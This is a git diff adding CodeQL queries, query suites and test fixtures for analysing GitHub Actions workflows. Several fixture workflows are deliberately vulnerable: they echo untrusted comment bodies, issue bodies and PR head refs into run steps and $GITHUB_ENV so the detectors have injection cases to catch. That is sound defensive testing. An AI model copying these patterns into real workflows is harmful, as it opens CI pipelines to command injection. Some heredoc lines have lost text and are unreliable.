b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md new file mode 100644 index 000000000000..cc371738d4aa --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.md @@ -0,0 +1,29 @@ +# Unversioned Immutable Action + +## Description + +Using an immutable action without indicating proper semantic version will result in the version being resolved to a tag that is mutable. This means the action code can change between runs and without the user's knowledge. Using an immutable action with proper semantic versioning will resolve to the exact version +of the action stored in the GitHub package registry. The action code will not change between runs. + +## Recommendations + +When using [immutable actions](https://github.com/github/package-registry-team/blob/main/docs/immutable-actions/immutable-actions-howto.md) use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs. + +## Examples + +### Incorrect Usage + +```yaml +- uses: actions/checkout@some-tag +- uses: actions/checkout@2.x.x +``` + +### Correct Usage + +```yaml +- uses: actions/checkout@4.0.0 +``` + +## References + +- [Consuming immutable actions]() diff --git a/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql new file mode 100644 index 000000000000..ac8cc249318e --- /dev/null +++ b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -0,0 +1,18 @@ +/** + * @name Unversioned Immutable Action + * @description Using an Immutable Action without a semantic version tag opts out of the protections of Immutable Action + * @kind problem + * @problem.severity recommendation + * @precision high + * @id actions/unversioned-immutable-action + * @tags security + * actions + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UseOfUnversionedImmutableAction + +from UnversionedImmutableAction step +select step, "The workflow is using an eligible immutable action ($@) without semantic versioning", + step, step.getCallee() diff --git a/actions/ql/src/Security/CWE-918/RequestForgery.ql b/actions/ql/src/Security/CWE-918/RequestForgery.ql new file mode 100644 index 000000000000..9721d666bd45 --- /dev/null +++ b/actions/ql/src/Security/CWE-918/RequestForgery.ql @@ -0,0 +1,23 @@ +/** + * @name Uncontrolled data used in network request + * @description Sending network requests with user-controlled data allows for request forgery attacks. + * @kind path-problem + * @problem.severity error + * @security-severity 9.1 + * @precision high + * @id actions/request-forgery + * @tags actions + * security + * experimental + * external/cwe/cwe-918 + */ + +import actions +import codeql.actions.security.RequestForgeryQuery +import RequestForgeryFlow::PathGraph + +from RequestForgeryFlow::PathNode source, RequestForgeryFlow::PathNode sink +where RequestForgeryFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential request forgery in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md new file mode 100644 index 000000000000..21a56e8d84d6 --- /dev/null +++ b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md @@ -0,0 +1,13 @@ +# Unneccesary use of advanced configuration + +## Description + +The CodeQL workflow does not use any custom settings and could be simplified by switching to the CodeQL default setup. + +## Recommendations + +If there is no reason to have a custom configuration switch to the CodeQL default setup. + +## References + +- [GitHub Docs: Configuring Default Setup for a repository](https://docs.github.com/en/code-security/code-scanning/enabling-code-scanning/configuring-default-setup-for-code-scanning#configuring-default-setup-for-a-repository) \ No newline at end of file diff --git a/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql new file mode 100644 index 000000000000..dc65fab292b3 --- /dev/null +++ b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql @@ -0,0 +1,15 @@ +/** + * @name Workflow Should Use Default Setup + * @description Workflows should use CodeQL Action with default setup instead of advanced configuration if there are no customizations + * @kind problem + * @problem.severity recommendation + * @precision high + * @id actions/unnecessary-use-of-advanced-config + * @tags actions + * maintainability + */ + +import codeql.actions.Violations_Of_Best_Practices.DefaultableCodeQLInitiatlizeActionQuery + +from DefaultableCodeQLInitiatlizeActionQuery action +select action, "CodeQL Action could use default setup instead of advanced configuration." diff --git a/actions/ql/src/change-notes/2024-12-19-initial-release.md b/actions/ql/src/change-notes/2024-12-19-initial-release.md new file mode 100644 index 000000000000..e02078ea2731 --- /dev/null +++ b/actions/ql/src/change-notes/2024-12-19-initial-release.md @@ -0,0 +1,4 @@ +--- +category: newQuery +--- +* Initial public preview release diff --git a/actions/ql/src/codeql-pack.lock.yml b/actions/ql/src/codeql-pack.lock.yml new file mode 100644 index 000000000000..53004274575d --- /dev/null +++ b/actions/ql/src/codeql-pack.lock.yml @@ -0,0 +1,4 @@ +--- +lockVersion: 1.0.0 +dependencies: {} +compiled: false diff --git a/actions/ql/src/codeql-suites/actions-all.qls b/actions/ql/src/codeql-suites/actions-all.qls new file mode 100644 index 000000000000..be9be8666201 --- /dev/null +++ b/actions/ql/src/codeql-suites/actions-all.qls @@ -0,0 +1,10 @@ +- description: Standard Code Scanning queries for Actions +- queries: . +- include: + kind: + - problem + - path-problem +- exclude: + tags contain: + - debug + - model-generator diff --git a/actions/ql/src/codeql-suites/actions-bughalla.qls b/actions/ql/src/codeql-suites/actions-bughalla.qls new file mode 100644 index 000000000000..0d718fac616e --- /dev/null +++ b/actions/ql/src/codeql-suites/actions-bughalla.qls @@ -0,0 +1,6 @@ +- description: Bughalla queries for Actions +- queries: '.' +- exclude: + tags contain: + - debug + diff --git a/actions/ql/src/codeql-suites/actions-code-scanning.qls b/actions/ql/src/codeql-suites/actions-code-scanning.qls new file mode 100644 index 000000000000..ce3ff4893356 --- /dev/null +++ b/actions/ql/src/codeql-suites/actions-code-scanning.qls @@ -0,0 +1,11 @@ +- description: Standard Code Scanning queries for Actions +- queries: '.' +- include: + problem.severity: + - error + - recommendation +- exclude: + tags contain: + - experimental + - debug + diff --git a/actions/ql/src/codeql-suites/actions-security-and-quality.qls b/actions/ql/src/codeql-suites/actions-security-and-quality.qls new file mode 100644 index 000000000000..ef332acb872c --- /dev/null +++ b/actions/ql/src/codeql-suites/actions-security-and-quality.qls @@ -0,0 +1,11 @@ +- description: Security-and-quality queries for Actions +- queries: '.' +- include: + problem.severity: + - error + - recommendation +- exclude: + tags contain: + - experimental + - debug + diff --git a/actions/ql/src/codeql-suites/actions-summaries-queries.qls b/actions/ql/src/codeql-suites/actions-summaries-queries.qls new file mode 100644 index 000000000000..5526197c7db2 --- /dev/null +++ b/actions/ql/src/codeql-suites/actions-summaries-queries.qls @@ -0,0 +1,8 @@ +- description: Queries to model composite actions +- queries: . + +- include: + kind: + - path-problem + tags contain: + - model-generator diff --git a/actions/ql/src/qlpack.yml b/actions/ql/src/qlpack.yml index 0cede827207b..f822a516e569 100644 --- a/actions/ql/src/qlpack.yml +++ b/actions/ql/src/qlpack.yml @@ -1,8 +1,10 @@ name: codeql/actions-queries -version: 0.0.1-dev +version: 0.4.0-dev library: false +warnOnImplicitThis: true groups: [actions, queries] +suites: codeql-suites extractor: actions +defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: codeql/actions-all: ${workspace} -warnOnImplicitThis: true diff --git a/actions/ql/test/codeql-pack.lock.yml b/actions/ql/test/codeql-pack.lock.yml new file mode 100644 index 000000000000..53004274575d --- /dev/null +++ b/actions/ql/test/codeql-pack.lock.yml @@ -0,0 +1,4 @@ +--- +lockVersion: 1.0.0 +dependencies: {} +compiled: false diff --git a/actions/ql/test/library-tests/.github/workflows/commands.yml b/actions/ql/test/library-tests/.github/workflows/commands.yml new file mode 100644 index 000000000000..48aa5b5810bc --- /dev/null +++ b/actions/ql/test/library-tests/.github/workflows/commands.yml @@ -0,0 +1,39 @@ +on: push + +defaults: + run: + shell: bash -wkf + +jobs: + local_commands: + runs-on: ubuntu-latest + defaults: + run: + shell: bash -job + steps: + + - shell: bash -step + run: | + command1 ; command2 + - run: | + command3 | command4 + - run: | + command5 "$(command6)" + - run: | + command7 && command8 + - run: | + command9 || command10 + - run: | + command11 "`command12`" + - run: | + command13 "`command14` $(date | wc -l)" + + local_commands2: + runs-on: ubuntu-latest + steps: + - shell: bash -step + run: | + command1 ; command2 + - shell: pwsh + run: | + command3 | command4 diff --git a/actions/ql/test/library-tests/.github/workflows/expression_nodes.yml b/actions/ql/test/library-tests/.github/workflows/expression_nodes.yml new file mode 100644 index 000000000000..1d40cabdd6ac --- /dev/null +++ b/actions/ql/test/library-tests/.github/workflows/expression_nodes.yml @@ -0,0 +1,22 @@ +on: issue_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: LINE 1echo '${{ github.event.comment.body }}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + - run: > + LINE 1 echo '${{ github.event.comment.body }}' + echo '${{github.event.issue.body}}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + LINE 3 echo '${{ github.event.comment.body }}' + - run: "LINE 1 echo '${{ github.event.comment.body }}' + echo '${{github.event.issue.body}}'" + diff --git a/actions/ql/test/library-tests/.github/workflows/multiline.yml b/actions/ql/test/library-tests/.github/workflows/multiline.yml new file mode 100644 index 000000000000..dafcd56bba91 --- /dev/null +++ b/actions/ql/test/library-tests/.github/workflows/multiline.yml @@ -0,0 +1,89 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + - run: | + echo "changelog<> $GITHUB_OUTPUT + echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT + echo "CHANGELOGEOF" >> $GITHUB_OUTPUT + - run: | + EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) + echo "status<<$EOF" >> $GITHUB_OUTPUT + echo "$(cat status.output.json)" >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + echo "response<<$EOF" >> $GITHUB_OUTPUT + echo $output >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - run: | + cat <<-"EOF" > event.json + ${{ toJson(github.event) }} + EOF + - name: heredoc11 + run: | + cat >> $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL >> $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF >> "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - name: block11 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block12 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block13 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/actions/ql/test/library-tests/.github/workflows/multiline2.yml b/actions/ql/test/library-tests/.github/workflows/multiline2.yml new file mode 100644 index 000000000000..1941dd8f22ab --- /dev/null +++ b/actions/ql/test/library-tests/.github/workflows/multiline2.yml @@ -0,0 +1,89 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + - run: | + echo "changelog< event.json + ${{ toJson(github.event) }} + EOF + - name: heredoc11 + run: | + cat | tee -a $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL | tee -a $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF | tee -a "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') | tee -a $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE< output + - run: python venv/bin/activate.py + - run: echo foo; python venv/bin/activate.py + - run: pnpm run test:ct + - run: pip install nbformat && python scripts/generate_notebooks.py + - run: python scripts/generate_theme.py --outfile js/storybook/theme.css + - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css + - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css + - run: xvfb-run ./mvnw clean package + - run: echo "foo" && npm i && echo "bar" + - run: echo "foo" | npm i | echo "bar" + - run: echo "foo" | npm i | echo "bar" + - run: echo "foo `npm i` bar" + - run: dotnet test foo/Tests.csproj -c Release + - run: go run foo.go + - run: sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # not supported yet + - run: sed -f ./config.sed file.txt > foo.txt + - run: sed -f config file.txt > foo.txt + - run: echo "foo" | awk -f ./config.awk > foo.txt + - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo + - run: ./foo/cmd + - run: | + sed -e 's##TITLE#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##${TITLE}#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky diff --git a/actions/ql/test/library-tests/.github/workflows/test.yml b/actions/ql/test/library-tests/.github/workflows/test.yml new file mode 100644 index 000000000000..754105a49e63 --- /dev/null +++ b/actions/ql/test/library-tests/.github/workflows/test.yml @@ -0,0 +1,40 @@ +on: push + +jobs: + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: "foo" + replace: "" + - id: simplesink1 + run: echo ${{ steps.source.outputs.all_changed_files }} + - id: simplesink2 + run: ${{ github.event.pull_request.head.ref }} + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/library-tests/Placeholder.expected b/actions/ql/test/library-tests/Placeholder.expected deleted file mode 100644 index 2a4f078a25fc..000000000000 --- a/actions/ql/test/library-tests/Placeholder.expected +++ /dev/null @@ -1 +0,0 @@ -| 1 | diff --git a/actions/ql/test/library-tests/Placeholder.ql b/actions/ql/test/library-tests/Placeholder.ql deleted file mode 100644 index 82198eaf87be..000000000000 --- a/actions/ql/test/library-tests/Placeholder.ql +++ /dev/null @@ -1 +0,0 @@ -select 1 diff --git a/actions/ql/test/library-tests/commands.expected b/actions/ql/test/library-tests/commands.expected new file mode 100644 index 000000000000..35305671cf05 --- /dev/null +++ b/actions/ql/test/library-tests/commands.expected @@ -0,0 +1,202 @@ +| .github/workflows/commands.yml:15:9:18:6 | Run Step | command1 | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | command2 | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | command3 | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | command4 | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | command5 "$(command6)" | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | command6 | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | command7 | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | command8 | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | command9 | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | command10 | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | command11 "`command12`" | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | command12 | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | command13 "`command14` $(date \| wc -l)" | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | command14 | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | date | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | wc -l | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | command1 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | command2 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | tee -a $GITHUB_OUTPUT | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64) | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | base64 | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | cat status.output.json | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | dd if=/dev/urandom bs=15 count=1 status=none | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | echo "$(cat status.output.json)" | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | echo "$EOF" | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | echo "status< | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | tee -a $GITHUB_OUTPUT | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | echo "$EOF" | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | echo "response< | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | echo $output | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | tee -a $GITHUB_OUTPUT | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | echo EOF | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | grep -E "*.(tar.gz\|zip)$" | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | ls | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | tee -a "$GITHUB_ENV" | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | ${{ toJson(github.event) }} | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | tee -a $GITHUB_ENV < | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt < | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat < | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | sed 's/l/e/g' > file.txt | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat < | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | tee -a "$GITHUB_ENV" | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tr -d ' ' | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE< | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | echo EOF | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | tee -a "$GITHUB_ENV" | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | echo '$ISSUE' | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | echo 'EOF' | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | tee -a "$GITHUB_ENV" | +| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | tee -a "$GITHUB_ENV" | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog< event.json | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | EOL | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV < | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt < | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | sed 's/l/e/g' > file.txt | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE< foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | echo "foo" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | diff --git a/actions/ql/test/library-tests/commands.ql b/actions/ql/test/library-tests/commands.ql new file mode 100644 index 000000000000..4092ac09d832 --- /dev/null +++ b/actions/ql/test/library-tests/commands.ql @@ -0,0 +1,4 @@ +import actions + +from Run run +select run, run.getScript().getACommand() diff --git a/actions/ql/test/library-tests/poisonable_steps.expected b/actions/ql/test/library-tests/poisonable_steps.expected new file mode 100644 index 000000000000..c93753e8f724 --- /dev/null +++ b/actions/ql/test/library-tests/poisonable_steps.expected @@ -0,0 +1,28 @@ +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | diff --git 